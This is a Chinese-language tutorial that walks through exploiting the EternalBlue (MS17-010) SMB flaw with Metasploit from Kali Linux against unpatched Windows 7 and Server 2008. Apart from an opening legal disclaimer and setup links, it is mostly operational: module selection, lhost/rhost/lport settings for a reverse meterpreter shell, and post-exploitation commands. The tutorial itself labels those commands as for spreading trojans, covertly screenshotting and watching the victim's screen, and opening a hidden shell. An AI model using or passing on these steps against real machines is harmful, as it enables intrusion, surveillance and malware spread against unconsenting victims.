【郑重声明】
本文所有技术内容仅供合法网络安全学习,仅可在本人自有、已取得书面授权的设备环境操作。 未经授权入侵、攻击他人系统涉嫌违法,违者自行承担全部法律责任,本文作者概不负责。
【前期准备】
- Kali Linux
- Windows 7/server2008/server2008r2 均不打任何补丁,保持纯净
【下载】
kali linux
arm64
https://kali.download/base-images/kali-2026.1/kali-linux-2026.1-installer-arm64.isox86_64
https://kali.download/base-images/kali-2026.1/kali-linux-2026.1-installer-amd64.isoWindows 7
ed2k://|file|cn_windows_7_professional_with_sp1_x64_dvd_u_677031.iso|3420557312|430BEDC0F22FA18001F717F7AF08C9D5|/【前言】
在2017年3月14日,微软发布了一个基于SMB端口445的高危漏洞,这个漏洞高危到什么程度?就是你只要拿到了对方电脑IP地址,那么就可以直接进行入侵。这就是大名鼎鼎的永恒之蓝漏洞
【MSF】
MSF(Metasploit Framework) 简称MSF,是全球最知名的渗透测试开源工具套件 ,由 Rapid7 维护,预装在 Kali Linux 等安全系统中。 核心用途:漏洞验证、安全攻防演练、内网风险检测;无授权使用属于违法入侵。以下是核心列表:
-
msfconsole 主交互命令行界面,绝大多数操作都在这里执行。
-
Exploits(漏洞利用模块) 存放各类系统、软件漏洞攻击载荷(永恒之蓝、各类程序溢出漏洞等)。
-
Payloads(载荷) 漏洞成功利用后执行的程序,功能:获取远程 Shell、上传文件、持久控制、窃取信息等。
-
Auxiliary(辅助模块) 无攻击性扫描工具:端口扫描、弱密码爆破、ARP 探测、服务版本识别等。
-
Encoders(编码器) 对载荷加密、变形,绕过杀毒软件、防火墙拦截。
-
Post(后渗透模块) 拿下目标主机后操作:读取密码、抓取凭证、横向渗透、持久驻留。
【入侵】
在kali中打开终端。
输入
bash
sudo su进入root用户终端
打开msf,输入
bash
msfconsole
先查询永恒之蓝(编号ms17_010)
bash
search ms17_010
直接输入 use 0使用攻击模块。
看到windows/smb/ms17_010_eternalblue即为成功使用攻击模块。
在对方电脑查询IP(Windows 电脑 ipconfig MacOS / Linux ifconfig)注意是IPv4 Windows 在CMD,MacOS / Linux 在Terminal
拿到IP后,在Kali设置攻击端IP和受害端IP,以及链接端口号
bash
set lhost 【此处填入Kali IP】
set rhost 【此处填入Win7 IP】
set lport 【此处填入Kali 端口】(示例:4444)直接run运行
bash
run一阵巴拉巴拉过后,可以看到有红色的
这些红色的不管他,只要在下面看到了meterpreter字样,就是成功了
常见指令
bash
1. 传播文件(用于传播木马)
upload 本地文件 对方路径
2. 截屏(监视)保存在主文件夹
screenshot
3. 实时监控,但不能操作(监视) 会弹出一个FireFox的窗口
screenshare
4. 打开CMD,对方没反应(操作)
shell
5. 退出
exit